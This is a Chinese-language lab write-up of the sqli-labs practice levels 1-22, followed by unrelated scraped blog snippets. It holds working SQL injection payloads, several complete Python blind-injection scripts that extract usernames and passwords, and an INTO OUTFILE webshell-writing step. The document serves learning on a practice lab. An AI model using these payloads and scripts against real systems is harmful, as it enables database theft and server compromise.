Y4tacker

[SQL注入][Basci Challenges]sqli-labs学习记录(1-22关)

学习记录

前置小知识点

系统函数
字符串连接函数
一般用于替换的语句
union 操作符

盲注小知识点

布尔型

逻辑判断
配合正则注入
Payload
exp 报错
bigint溢出
其他

基于时间的盲注
第一关--字符型注入
第二关--数字型注入
第三关--构造闭合
第四关 ---闭合sql语句
第五关 ----- 盲注
第六关 ------时间盲注与报错注入
第七关 --- 文件导入
第八关 --- 盲注
第九关-----时间盲注
第十关-----基于双引号的时间盲注
第十一关-----POST型注入
第十二关--闭合
第十三关---报错注入
第十四关 --- 盲注
第十五关---盲注
第十六关 --- 盲注报错都行无聊的题
第十七关 --- 报错注入
第十八关 --- UA注入
第十九关---Referer头注入
第二十关 --- Cookie注入
第二十一关 --- Cookie注入
第二十二关 --- Cookie注入

前置小知识点

系统函数

version()——MySQL 版本
user()——数据库用户名
database()——数据库名
@@datadir——数据库路径
@@version_compile_os——操作系统版本

字符串连接函数

1.concat(str1,str2,…)——没有分隔符地连接字符串
2.concat_ws(separator,str1,str2,…)——含有分隔符地连接字符串
3.group_concat(str1,str2,…)——连接一个组的所有字符串，并以逗号分隔每一条数据说着比较抽象，其实也并不需要详细了解，知道这三个函数能一次性查出所有信息就行了。

一般用于替换的语句

or 1=1–+
'or 1=1–+
"or 1=1–+
)or 1=1–+
')or 1=1–+
") or 1=1–+
"))or 1=1–+

union 操作符

UNION 操作符用于合并两个或多个 SELECT 语句的结果集。但是UNION 内部的 SELECT 语句必须拥有相同数量的列，列也必须拥有相似的数据类型。同时每条 SELECT 语句中的列的顺序必须相同。
：默认地，UNION 操作符选取不同的值。如果允许重复的值，请使用 UNION ALL。

盲注小知识点

布尔型

逻辑判断

left(database(),1)>’s’ //left()函数
说明:database()显示数据库名称，left(a,b)从左侧截取 a 的前 b 位
ascii(substr((select table_name information_schema.tables where tables_schema =database()limit 0,1),1,1))=101 --+ //substr()函数，ascii()函数
说明：substr(a,b,c)从 b 位置开始，截取字符串 a 的 c 长度。Ascii()将某个字符转换为 ascii 值
比如：ascii(substr((select database()),1,1))=98
ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))>98%23 //ORD()函数，MID()函数
说明：mid(a,b,c)从位置 b 开始，截取 a 字符串的 c 位 Ord()函数同 ascii()，将字符转为 ascii 值

配合正则注入

regexp 正则注入
用法介绍：select user() regexp ‘^[a-z]’;
说明：正则表达式的用法，user()结果为 root，regexp 为匹配 root 的正则表达式。第二位可以用 select user() regexp '^ro’来进行。

Payload

Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2)) a from information_schema.columns group by a;
以上语句可以简化成如下的形式
select count(*) from information_schema.tables group by concat(version(), floor(rand(0)*2))
如果关键的表被禁用了，可以使用这种形式 
select count(*) from (select 1 union select null union select !1) group by concat(version(),floor(rand(0)*2))
如果 rand 被禁用了可以使用用户变量来报错
select min(@a:=1) from information_schema.tables group by concat(password,@a:=(@a+1)%2)

exp 报错

select exp(~(select * FROM(SELECT USER())a))
说明：double 数值类型超出范围
Exp()为以 e 为底的对数函数；版本在 5.5.5 及其以上
参考 exp 报错文章

bigint溢出

select !(select * from (select user())x) - ~0
bigint 超出范围；~0 是对 0 逐位取反，很大的版本在 5.5.5 及其以上
具体可以百度，我也不太清楚

其他

extractvalue(1,concat(0x7e,(select @@version),0x7e)) 
--+ mysql 对 xml 数据进 行查询和修改的 xpath 函数，xpath 语法错误
updatexml(1,concat(0x7e,(select @@version),0x7e),1)
--+ mysql 对 xml 数据进行 查询和修改的 xpath 函数，xpath 语法错误
select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;
--+ mysql 重复特性，此处重复了 version，所以报错
select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x

基于时间的盲注

If(ascii(substr(database(),1,1))>115,0,sleep(5))#
--+ if 判断语句，条件为假， 执行 sleep
UNION SELECT IF(SUBSTRING(current,1,1)=CHAR(119),BENCHMARK(5000000,ENCODE(‘M SG’,’by 5 seconds’)),null) FROM (select database() as current) as tb1;
--+BENCHMARK(count,expr)用于测试函数的性能，参数一为次数，二为要执行的表达 式。可以让函数执行若干次，返回结果比平时要长，通过时间长短的变化，判断语句是否执 行成功。这是一种边信道攻击，在运行过程中占用大量的 cpu 资源。推荐使用 sleep()

第一关–字符型注入

id=1回显正常

说明是字符型注入，并且加了这个后多了个’所以注释后面

可能版本独特报错直接告诉我只有3列

查表名

查列名

查询对应数据

第二关–数字型注入

id=1与2-1都一样

查到有3列

查表名

查列名

查询数据

第三关–构造闭合

得出闭合为(’’)

有3列
判断表名

判断列名

得到数据

第四关 —闭合sql语句

闭合方式("")

有3列
查表名

查列名

查数据

第五关 ----- 盲注

这一关如果正确则显示you are in …,失败则无，判断是盲注，再加上没有绕过，直接上二分法脚本

import requests

url = "url/?id=1' and 1= "


result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # payload = f'if(ascii(substr(database(),{i},1))>{mid},1,0)--+'
        # payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1))>{mid},1,0)--+'
        # payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),{i},1))>{mid},1,0)--+'
        # payload = f'if(ascii(substr((select group_concat(username) from users),{i},1))>{mid},1,0)--+'
        payload = f'if(ascii(substr((select group_concat(password) from users),{i},1))>{mid},1,0)--+'
        r = requests.get(url + payload)
        if "You are in" in r.text:
            head = mid + 1
        else:
            tail = mid

    if head != 32:
        result += chr(head)
    else:
        break
print(result)

第六关 ------时间盲注与报错注入

import requests

url = "url/?id=1\" and 1= "

result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        payload = f'if(ascii(substr(database(),{i},1))>{mid},1,sleep(3))--+'
        # payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1))>{mid},1,sleep(3))--+'
        # payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),{i},1))>{mid},1,sleep(3))--+'
        # payload = f'if(ascii(substr((select group_concat(username) from users),{i},1))>{mid},1,sleep(3))--+'
        # payload = f'if(ascii(substr((select group_concat(password) from users),{i},1))>{mid},1,sleep(3))--+'
        try:
            r = requests.get(url + payload, timeout=2)
            head = mid + 1
        except Exception as e:
            tail = mid


    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

当然报错注入也是ok的

这个也行

数据溢出那些都可以就不再演示

第七关 — 文件导入

看提示

插入一句话木马完事了
http://127.0.0.1/sqllib/Less-7/?id=1’))UNION SELECT 1,2,’’ i nto outfile “c:\wamp\www\sqllib\Less-7\yijuhua.php”–+

第八关 — 盲注

这关不能用报错注入，看源代码发现把错误提示注释了

import requests

url = "url?id=1' and 1="

result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # payload = f'if(ascii(substr(database(),{i},1))>{mid},1,0)--+'
        # payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1))>{mid},1,0)--+'
        # payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),{i},1))>{mid},1,0)--+'
        # payload = f'if(ascii(substr((select group_concat(username) from users),{i},1))>{mid},1,0)--+'
        # payload = f'if(ascii(substr((select group_concat(password) from users),{i},1))>{mid},1,0)--+'
        r = requests.get(url + payload, timeout=2)
        if 'You are in' in r.text:
            head = mid + 1
        else:
            tail = mid



    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

第九关-----时间盲注

看标题知道是时间盲注，事实上不管我咋输入其他sql语句都是一个结果，用二分法爆出结果

import requests

url = "url?id=1' and 1="

result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        payload = f'if(ascii(substr(database(),{i},1))>{mid},1,sleep(3))--+'
        # payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1))>{mid},1,sleep(3))--+'
        # payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),{i},1))>{mid},1,sleep(3))--+'
        # payload = f'if(ascii(substr((select group_concat(username) from users),{i},1))>{mid},1,sleep(3))--+'
        # payload = f'if(ascii(substr((select group_concat(password) from users),{i},1))>{mid},1,sleep(3))--+'
        try:
            r = requests.get(url + payload, timeout=2)
            head = mid + 1
        except Exception as e:
            tail = mid



    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

第十关-----基于双引号的时间盲注

import requests

url = "url/?id=1\" and 1="

result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        payload = f'if(ascii(substr(database(),{i},1))>{mid},1,sleep(3))--+'
        # payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1))>{mid},1,sleep(3))--+'
        # payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),{i},1))>{mid},1,sleep(3))--+'
        # payload = f'if(ascii(substr((select group_concat(username) from users),{i},1))>{mid},1,sleep(3))--+'
        # payload = f'if(ascii(substr((select group_concat(password) from users),{i},1))>{mid},1,sleep(3))--+'
        try:
            r = requests.get(url + payload, timeout=2)
            head = mid + 1
        except Exception as e:
            tail = mid



    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

第十一关-----POST型注入

不知道为什么用–+就不行，用#注释也不行
admin'or'1'='1#这样发现可以
判断两列
uname=admin' or 1=1 union select 1,2-- -&passwd=admin&submit=Submit
得到回显位置

查数据库

查数据表

查users表下的列名

查数据

第十二关–闭合

通过构造参数我发现sql语句应该是类似这样@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";

后面就是老思路了，也没waf

第十三关—报错注入

其实也可以像这样，但是我想试试报错注入
uname=admin’)and left(database(),1)>‘a’#&passwd=1&submit=Submit

updatexml测试没问题
111') and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)#

111') and extractvalue(1,concat(0x7e,(select @@version),0x7e))#也没问题

那就随便玩了

第十四关 — 盲注

报错注入也行我想玩一下盲注
上二分法脚本

import requests

url = "url"

result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # payload = f'hhh" or 1=if(ascii(substr(database(),{i},1))>{mid},1,0)#'
        payload = f'hhh" or 1=if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1))>{mid},1,0)-- -'
        # payload = f'hhh" or 1=if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),{i},1))>{mid},1,0) #'
        # payload = f'hhh" or 1=if(ascii(substr((select group_concat(username) from users),{i},1))>{mid},1,0) #'
        # payload = f'hhh" or 1=if(ascii(substr((select group_concat(password) from users),{i},1))>{mid},1,0) #'
        data = {
            'uname': 'hhh',
            'passwd': payload
        }
        r = requests.post(url, data=data)
        if 'flag' in r.text:
            head = mid + 1
        else:
            tail = mid

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

第十五关—盲注

无聊的重复工作，懒得做了，改个参数就行

import requests

url = "url"

result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # payload = f'hhh\' or 1=if(ascii(substr(database(),{i},1))>{mid},1,0)#'
        payload = f'hhh\' or 1=if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1))>{mid},1,0)-- -'
        # payload = f'hhh\' or 1=if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),{i},1))>{mid},1,0) #'
        # payload = f'hhh\' or 1=if(ascii(substr((select group_concat(username) from users),{i},1))>{mid},1,0) #'
        # payload = f'hhh\' or 1=if(ascii(substr((select group_concat(password) from users),{i},1))>{mid},1,0) #'
        data = {
            'uname': payload,
            'passwd': ' '
        }
        r = requests.post(url, data=data)
        if 'flag' in r.text:
            head = mid + 1
        else:
            tail = mid

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

第十六关 — 盲注报错都行无聊的题

import requests

url = "url"

result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # payload = f'hhh") or 1=if(ascii(substr(database(),{i},1))>{mid},1,0)#'
        # payload = f'hhh") or 1=if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1))>{mid},1,0)-- -'
        # payload = f'hhh") or 1=if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),{i},1))>{mid},1,0) #'
        # payload = f'hhh") or 1=if(ascii(substr((select group_concat(username) from users),{i},1))>{mid},1,0) #'
        payload = f'hhh") or 1=if(ascii(substr((select group_concat(password) from users),{i},1))>{mid},1,0) #'
        data = {
            'uname': payload,
            'passwd': ' '
        }
        r = requests.post(url, data=data)
        if 'flag' in r.text:
            head = mid + 1
        else:
            tail = mid

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

第十七关 — 报错注入

这关不能在username哪里搞事情，看了源码就知道了，一堆转义

发现加了'后出错

注释掉后又正常，猜测语句为：
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
这里用爆错注入吧
1' and updatexml(1,concat(0x7e,(select @@version),0x7e),1)#,没啥问题

第十八关 — UA注入

有个这个猜测改IP参数

发现改IP不好搞诶，试一下登录，通过爆破得到用户名和密码

发现改UA头没问题，也没有waf，那就算是做完了

第十九关—Referer头注入

还是老规矩吧，先登录看一下是啥类型的

和18关一样没啥好做的吧

第二十关 — Cookie注入

这个提示还不明显么

修改Cookie为uname=admin1'and extractvalue(1,concat(0x7e,(select @@basedir),0x7e))#
懒得做了都这样了还做不出来才怪了

第二十一关 — Cookie注入

看了一眼也就是base64而已

把上一关payload base64编码即可
uname=YWRtaW4xJylhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBAQGJhc2 VkaXIpLDB4N2UpKSM=
就算做完了

第二十二关 — Cookie注入

好像绕过了报错注入，那就手动试一试

hhh没问题，只是那个加密网站辣鸡出问题了

java reactor框架_关于java:Java反应式框架Reactor中的Mono和Flux 中一贝爷 java reactor框架
1.前言最近写对于响应式编程的货色有点多，很多同学反映对Flux和Mono这两个Reactor中的概念有点懵逼。然而目前Java响应式编程中咱们对这两个对象的接触又最多，诸如SpringWebFlux、RSocket、R2DBC。我开始也对这两个对象头疼，所以明天咱们就简略来探讨一下它们。2.响应流的特点要搞清楚这两个概念，必须说一下响应流标准。它是响应式编程的基石。他具备以下特点：响应流必须是无
web学习笔记11-node.js基础晴天.js web-学习笔记前端学习 node.js
一、ES6ECMAscript->ES是JS的标准规范ES6是JS的第六套标准规范1，块级作用域let声明的变量，会进入暂时性的死区，提升后暂时不允许访问，只有赋值以后才允许访问let声明的变量不允许重复声明块级作用域：大括号之间的语句块，例如if、else。块级作用域下，let和const声明的局部变量或者常量，不允许被块级作用域以外访问let和const即使声明在全局作用域下，也不是全局变量或
关于api接口的开发可能是假的程序员 api
第一次发表博客欢迎大家提出意见在传统的web网站上，我们通过cookie或者session在记录用户的信息及登陆状态，但是在app上，是没有session跟cookie这个概念的，那么，如果用户在app登陆之后，在进行其他行为的时候，我们如何知道他已经登陆过了呢，此时问题就来了，如何知道用户是否登陆（引入token这个概念）？1.最简单粗暴的方法，用户登陆之后返回用户id，并且把生成的token存
通过AI来创建一个_____html css网页制作成品例子演示数码小沙 html
使用AI输入创建一个htmlcss网页制作成品例然后出来好的，我将为您创建一个简单的HTML和CSS网页制作的示例。这个示例将包括基本的布局、文本样式和一些内联的CSS样式。{"name":"dalle","description":"AsimpleexampleofafinishedHTMLandCSSwebpage,featuringacleanlayoutwithaheader,naviga
Nginx的5种负载均衡配置一只不想敲代码的程序猿负载均衡服务器 nginx java 运维
Nginx在web应用的部署中，作为一种轻量级的负载均衡服务器，起到很强大的作用，其中的常见5种负载均衡的模式也是我们最常用的，下面给大家介绍一下相关的配置。Nginx负载的5种策略设置方法：轮询（默认）指定权重IP绑定ip_hashfairurl_hash1、轮询（默认）每个请求按时间顺序逐一分配到不同的后端服务器，如果后端服务器down掉，能自动剔除。轮询：nginx默认就是轮询其权重都默认为
网络安全学习路线图（2024版详解）白帽子008 web安全学习安全网络网络安全
近期，大家在网上对于网络安全讨论比较多，想要学习的人也不少，但是需要学习哪些内容，按照什么顺序去学习呢？其实我们已经出国多版本的网络安全学习路线图，一直以来效果也比较不错，本次我们针对市场需求，整理了一套系统的网络安全学习路线图，供大家学习参考。希望大家按照路线图进行系统学习不仅可以更高效的完成上岸，还能够系统化学习，提升自己的后期竞争力。第一阶段：数通安全Windows系统安全1.企业资产安全规
2024网络安全学习路线非常详细推荐学习白帽黑客-晨哥 web安全学习安全数据库 php
关键词：网络安全入门、渗透测试学习、零基础学安全、网络安全学习路线首先咱们聊聊，学习网络安全方向通常会有哪些问题1、打基础时间太长学基础花费很长时间，光语言都有几门，有些人会倒在学习linux系统及命令的路上，更多的人会倒在学习语言上；2、知识点掌握程度不清楚对于网络安全基础内容，很多人不清楚需要学到什么程度，囫囵吞枣，导致在基础上花费太多时间；看到很多小伙伴，买了HTML，PHP，数据库，计算机
什么是黑链？什么是黑帽？什么是明链？倔强的小蚁云Zt 网络数据库 tcp/ip 运维
什么是黑链？什么是黑帽？什么是明链？黑链有哪几种表示方式！怎样预防黑链？首先我们说下黑链定义:黑链是SEO黑帽手法中相当普遍的一种手段，笼统地说，它就是指一些人用非正常的手段获取的其它网站的反向链接，最常见的黑链就是通过各种网站程序漏洞获取搜索引擎权重或者PR较高的网站的WEBSHELL，进而在被黑网站上链接自己的网站。黑链的写法黑链文本黑链标签被放在一个隐藏的div中。用户在浏览器中是无法看到的
web安全学习笔记（1）头发的天敌是代码 web安全学习笔记 web安全学习笔记
一、网络安全分支1.web安全——网站2.二进制安全物联网安全工控安全二、网站是如何搭建起来的1.服务器服务器与我们的家庭使用电脑有什么区别？①没有显卡②CPU+内存不同于家庭电脑2.操作系统家庭系统：WindowsXPWindows7Windows8Windows9Windows10Windows11服务器操作系统：Windows2000Windows2003Windows2008Windows
Web安全与网络安全：SQL漏洞注入 hong161688 web安全 sql oracle
Web安全与网络安全：SQL漏洞注入引言在Web安全领域，SQL注入漏洞（SQLInjectionVulnerability）是一种极具破坏性的安全威胁。它允许攻击者通过向Web应用程序的输入字段中插入或“注入”恶意的SQL代码片段，从而操纵后台数据库系统，执行未授权的数据库查询，甚至可能获取数据库管理权限，进而对整个系统造成严重的安全损害。本文将从SQL注入的原理、分类、危害及防御策略等方面进行
网络安全工程师自主学习计划表（具体到阶段目标）大模型综述 web安全网络安全系统安全安全学习
前言接下来我将给大家分享一份网络安全工程师自学计划指南，全文将从学习路线、学习规划、学习方法三个方向来讲述零基础小白如何通过自学进阶网络安全工程师，全文篇幅有点长，同学们可以先点个收藏，以免日后错过了。目录前言学习路线学习规划初级1、网络安全理论知识（2天）2、渗透测试基础（1周）3、操作系统基础（1周）4、计算机网络基础（1周）5、数据库基础操作（2天）6、Web渗透（1周）中级、高级7、脚本编
html知识点总结软件技术NINI html笔记 html 前端
HTML（HyperTextMarkupLanguage）总结可以从其定义、基本结构、常用标签以及网页开发工具等多个方面进行阐述。一、HTML定义HTML是一种超文本标记语言，它不是一种编程语言，而是一种用于描述网页内容的标记语言。HTML文档由HTML标签和文本内容组成，这些标签告诉浏览器如何显示页面上的内容。HTML的发展始于1990年，由Web之父TimBerners-Lee发布，并随着互联
调研App里的WebDAV功能@FE File Explorer 文件管理器（二） jaminezhong
今天我又淘到一款特容易链接WebDAV的软件：FEFileExplorer我觉得它最大好处是在Mac版电脑、Android、iOS上，一个全功能的文件上管理app。而且还可以在您的iOS、安卓和Mac电脑上使用流媒体方式播放网络共享、NAS里面的视频和音乐。FEFileExplorerPro+穿越派=个人私有云需要穿越派的，在这里下：https://www.huluer.com/usercente
webpack 深入浅出分析之style-loader、css-loader、配置sass与less 城南花开ze Webpack Vite Gulp webpack css-loader style-loader 配置sass与less
一、webpack打包style-loader创建一个空文件夹，通过npminit初始化创建package.json文件，通过npminstallwebpack--save-dev命令下载webpack，通过npminstallstyle-loadercss-loader--save-dev命令下载style-loader和css-loader。创建css文件夹，在里面创建base.css和com
Css-loader安装失败,webpack打包css文件时，确认css-loader和style-loader安装正确，import路径都正确，打包反复报错... Malong Wu Css-loader安装失败
webpack打包css文件时，确认css-loader和style-loader都安装正确，且import路径都正确，打包反复报错：ERRORin./src/assets/styles/test.css1:0Moduleparsefailed:Unexpectedtoken(1:0)Youmayneedanappropriateloadertohandlethisfiletype,current
Web安全与网络安全：SQL漏洞注入 bigbig猩猩 typescript vue.js 前端
Web安全与网络安全：SQL漏洞注入引言在Web安全领域，SQL注入漏洞（SQLInjectionVulnerability）是一种极具破坏性的安全威胁。它允许攻击者通过向Web应用程序的输入字段中插入或“注入”恶意的SQL代码片段，从而操纵后台数据库系统，执行未授权的数据库查询，甚至可能获取数据库管理权限，进而对整个系统造成严重的安全损害。本文将从SQL注入的原理、分类、危害及防御策略等方面进行
python基础学习 agente python python 学习开发语言
第一章标识符1、python被称为胶水语言，可以跟各个代码能一块儿使用爬虫、数据分析web全栈开发、数据科学方向、人工智能的机械学习和深度学习、自动化运维、爬虫、办公自动化python是跨平台的，python是解释型语言，不需要编译，python是面向对象的语言1、print()#print()可以输出数字、字符串、含有运算符的表达式#print()可以将内容输出到显示器、文件#print()输出
Jmeter测试本地web应用会飞的猫丶。测试
一、Jmeter下载及安装官网：http://jmeter.apache.org/下载：下载源码：解压到相关文件夹：打开bin里面的jmeter.bat就可以使用了二、看不懂英文的可以把语言切换为中文：选择options--->chooselanguage--->chinese三、新建线程组1）线程数：指的是用户的请求数，默认的输入是“1”，如果想模拟100个请求，则此处输入100。2）Ramp-
CSS“多列布局”（补充）——WEB开发系列35 一条晒干的咸魚 WEB前端 javascript 前端 css html 多列布局 css3
多列布局是一种非常常见的布局方式，适用于内容丰富的页面，如新闻网站、杂志或博客。一、CSS多列布局概述CSS多列布局允许我们将内容分成多个垂直列，使页面布局更加灵活和多样化。多列布局的主要属性包括column-count、column-width和column-gap，这些属性可以单独或结合使用，以实现所需的列布局效果。多列布局的基本属性column-count：指定列的数量。例如，column-
css-loader/style-loader/less-loader/sass-loader/postcss-loader各有什么作用，一次性说明白 iWangsd css
大家都清楚在使用webpack构建前端项目时都会使用到sass-loader、less-loader、postcss-loader、css-loader、style-loader，但这些loader在其中起到什么作用呢？本篇主要阐述这些loader在打包中所扮演的角色。概述1、css-loader:加载.css文件的loader，会对@import和url()进行处理2、style-loader:
Python-request库的详细解析需要重新演唱 Python python 开发语言 request 库 http session
引言在现代网络应用中，与服务器进行通信是一个非常基础且重要的功能。Python的requests库是一个非常强大且易于使用的HTTP库，它允许我们发送HTTP请求，与Web服务进行交互。本文将详细介绍requests库的使用，包括其基本概念、常用功能以及一些高级用法。安装requests库在使用requests库之前，我们需要先安装它。可以通过pip命令来安装：pipinstallrequests
Python Web 框架篇：Flask、Django、FastAPI介绍及其核心技术 Switch616 Python Web python 前端 flask fastapi django 开发语言后端
PythonWeb框架篇：Flask、Django、FastAPI介绍及其核心技术目录FlaskFlask核心概念（路由、视图函数、模板渲染）FlaskBlueprint模块化应用Flask扩展（Flask-SQLAlchemy、Flask-WTF、Flask-Migrate等）DjangoDjango项目架构DjangoORM及模型定义Django中间件Django信号机制DjangoForm和
Java 获取中文拼音和首字母颇有几分姿色 java基础 java
需求：获取中文首字母当做用户登录名。获取用户姓名拼音做其他逻辑。不需要定制化使用hutool封装的PinyinUtil即可，我这里需要自己定制，所以写了个工具类。实现基于搜狐的Pinyin4j库。依赖：cn.hutoolhutool-all5.4.2com.belerwebpinyin4j2.5.1PinyinUtils代码示例PinyinUtils提供了以下主要方法：toHanYuPinyinS
python selenium post,是否可以在Selenium中捕获POST数据？ weixin_39600328 python selenium post
I'mworkingwiththeSeleniumWebDriverToolandamwonderingifthistoolprovidesameansforcapturingthePOSTdatageneratedwhensubmittingaform.I'musingthedjangotestframeworktotestthatmydataisprocessedcorrectlyontheb
信创那些事儿——Spring Boot中集成东方通中间件（TongWeb）北欧人写代码 tomcat 安全
在SpringBoot中集成东方通中间件（如TongWeb作为Servlet容器）通常涉及几个步骤，但需要注意的是，TongWeb本身是一个独立的JavaEE应用服务器，而不是像Tomcat那样可以直接嵌入到SpringBoot应用中的中间件。因此，集成通常意味着将SpringBoot应用打包为WAR文件并部署到TongWeb服务器上。以下是在SpringBoot中集成东方通中间件（以TongWe
基于spring boot的旅游管理系统鹿屿二向箔 spring boot 旅游后端
一个简单的SpringBoot应用的基础结构示例，以及如何设置一个基本的旅游管理系统。这个例子将包含用户注册和登录的基本功能。首先，你需要设置一个新的SpringBoot项目。可以通过SpringInitializr网站（https://start.spring.io/）来快速生成一个基础项目结构，选择必要的依赖项，比如Web、Thymeleaf、SpringDataJPA和MySQLDriver
深入理解Kotlin中的异步网络请求处理小白学大数据 kotlin 开发语言 android 爬虫
在现代移动和Web应用开发中，异步网络请求处理是核心功能之一。Kotlin，作为一种现代、简洁且功能强大的编程语言，提供了多种方式来处理异步任务，使得开发者能够编写出更加高效和响应迅速的应用。本文将深入探讨Kotlin中的异步网络请求处理，包括其原理、优势以及如何在实际项目中实现。异步网络请求的重要性在用户界面(UI)开发中，异步操作是至关重要的。它允许应用在不阻塞主线程的情况下，执行网络请求和其
Selenium面试题（二）知识的宝藏 Selenium（Java）selenium 测试工具
如何在不使用sendKeys()的情况下输入文本可以通过组合使用JavaScript和WebDriver扩展类来实现。以下是一个示例代码：publicstaticvoidsetAttribute(WebElementelement,StringattributeName,Stringvalue){WrapsDriverwrappedElement=(WrapsDriver)element;Java
SpringBoot学习（16）上传文件星河漫漫l spring boot 学习运维开发开发语言 spring
1、pom包配置我们使用SpringBoot版本2.1.0、jdk1.8、tomcat8.0。org.springframework.bootspring-boot-starter-parent2.1.0.RELEASE1.8org.springframework.bootspring-boot-starter-weborg.springframework.bootspring-boot-star
Web安全之SQL注入：如何预防及解决 J老熊 Java Web安全 web安全 sql 数据库系统架构面试
SQL注入（SQLInjection）是最常见的Web应用漏洞之一，它允许攻击者通过注入恶意SQL代码来操作数据库，获取、修改或删除数据。作为Java开发者，理解并防止SQL注入攻击是至关重要的。在本篇文章中，我们将详细介绍SQL注入的原理，演示如何在电商交易系统中出现SQL注入漏洞，并提供正确的防范措施和解决方案。1.什么是SQL注入？SQL注入是一种通过在用户输入中嵌入恶意SQL代码的攻击方式
jsonp 常用util方法 hw1287789687 jsonp jsonp常用方法 jsonp callback
jsonp 常用java方法 (1)以jsonp的形式返回:函数名(json字符串) /*** * 用于jsonp调用 * @param map : 用于构造json数据 * @param callback : 回调的javascript方法名 * @param filters : <code>SimpleBeanPropertyFilter theFilt
多线程场景 alafqq 多线程
0 能不能简单描述一下你在java web开发中需要用到多线程编程的场景？0 对多线程有些了解，但是不太清楚具体的应用场景，能简单说一下你遇到的多线程编程的场景吗？ Java多线程 2012年11月23日 15:41 Young9007 Young9007 4 0 0 4 Comment添加评论关注(2) 3个答案按时间排序按投票排序 0 0 最典型的如： 1、
Maven学习——修改Maven的本地仓库路径 Kai_Ge maven
安装Maven后我们会在用户目录下发现.m2 文件夹。默认情况下，该文件夹下放置了Maven本地仓库.m2/repository。所有的Maven构件(artifact)都被存储到该仓库中，以方便重用。但是windows用户的操作系统都安装在C盘，把Maven仓库放到C盘是很危险的，为此我们需要修改Maven的本地仓库路径。
placeholder的浏览器兼容 120153216 placeholder
【前言】自从html5引入placeholder后，问题就来了，不支持html5的浏览器也先有这样的效果，各种兼容，之前考虑，今天测试人员逮住不放，想了个解决办法，看样子还行，记录一下。【原理】不使用placeholder，而是模拟placeholder的效果，大概就是用focus和focusout效果。【代码】 <scrip
debian_用iso文件创建本地apt源 2002wmj Debian
1.将N个debian-506-amd64-DVD-N.iso存放于本地或其他媒介内，本例是放在本机/iso/目录下 2.创建N个挂载点目录如下： debian:~#mkdir –r /media/dvd1 debian:~#mkdir –r /media/dvd2 debian:~#mkdir –r /media/dvd3 …. debian:~#mkdir –r /media
SQLSERVER耗时最长的SQL 357029540 SQL Server
对于DBA来说，经常要知道存储过程的某些信息： 1. 执行了多少次 2. 执行的执行计划如何 3. 执行的平均读写如何 4. 执行平均需要多少时间列名 &
com/genuitec/eclipse/j2eedt/core/J2EEProjectUtil 7454103 eclipse
今天eclipse突然报了com/genuitec/eclipse/j2eedt/core/J2EEProjectUtil 错误，并且工程文件打不开了，在网上找了一下资料，然后按照方法操作了一遍，好了，解决方法如下：错误提示信息： An error has occurred.See error log for more details. Reason: com/genuitec/
用正则删除文本中的html标签 adminjun java html 正则表达式去掉html标签
使用文本编辑器录入文章存入数据中的文本是HTML标签格式，由于业务需要对HTML标签进行去除只保留纯净的文本内容，于是乎Java实现自动过滤。如下： public static String Html2Text(String inputString) { String htmlStr = inputString; // 含html标签的字符串 String textSt
嵌入式系统设计中常用总线和接口 aijuans linux 基础
嵌入式系统设计中常用总线和接口任何一个微处理器都要与一定数量的部件和外围设备连接，但如果将各部件和每一种外围设备都分别用一组线路与CPU直接连接，那么连线
Java函数调用方式——按值传递 ayaoxinchao java 按值传递对象基础数据类型
Java使用按值传递的函数调用方式，这往往使我感到迷惑。因为在基础数据类型和对象的传递上，我就会纠结于到底是按值传递，还是按引用传递。其实经过学习，Java在任何地方，都一直发挥着按值传递的本色。首先，让我们看一看基础数据类型是如何按值传递的。 public static void main(String[] args) { int a = 2;
ios音量线性下降 bewithme ios音量
